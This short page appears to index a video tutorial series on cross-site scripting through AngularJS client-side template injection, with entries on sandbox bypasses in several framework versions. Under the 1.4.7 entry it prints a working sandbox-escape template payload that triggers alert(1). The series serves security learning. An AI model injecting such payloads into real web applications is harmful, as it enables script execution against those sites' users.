Angular XSS Series

Payload List

PortSwigger Web Security Blog: XSS without HTML: Client-Side Template Injection with AngularJS

0x00. Introducing the AngularJS Javascript Framework - XSS in AngularJS

Video

0x1. Sandbox Bypass in Version 1.0.8 - XSS with AngularJS

Video

0x2. New Sandbox Bypass in 1.4.7 - XSS in AngularJS

Video - Part I

Video - Part II

Payload:

{{''a''.constructor.prototype.charAt=''b''.concat;$eval(''exploit=1}}};debugger;alert(1)//'');}}

0x03. Sandbox bypass for the latest AngularJS version 1.5.8 - XSS with AngularJS

Video

Recommended Talk:
Mario Heiderich - An Abusive Relationship with AngularJS -
Slide

Show Comments